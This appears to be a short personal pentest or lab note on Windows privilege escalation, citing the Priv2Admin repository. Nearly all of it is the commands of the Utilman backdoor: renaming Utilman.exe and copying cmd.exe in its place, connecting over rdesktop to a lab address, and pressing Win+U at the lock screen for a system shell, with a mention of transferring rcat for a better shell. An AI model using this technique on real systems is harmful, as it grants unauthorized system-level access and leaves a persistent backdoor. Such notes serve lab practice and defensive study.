Last updated 2 months ago
Now using this page: https://github.com/gtworek/Priv2Admin
ren "C:/Windows/System32/Utilman.exe" Utilman.old
ren "C:/Windows/SYstem32/cmd.exe" Utilman.exe
Now we can get to the lockscreen with rdesktop:
rdesktop 192.168.180.254
Now press win + U
win + U
We can transfer rcat and execute to get a proper shell:
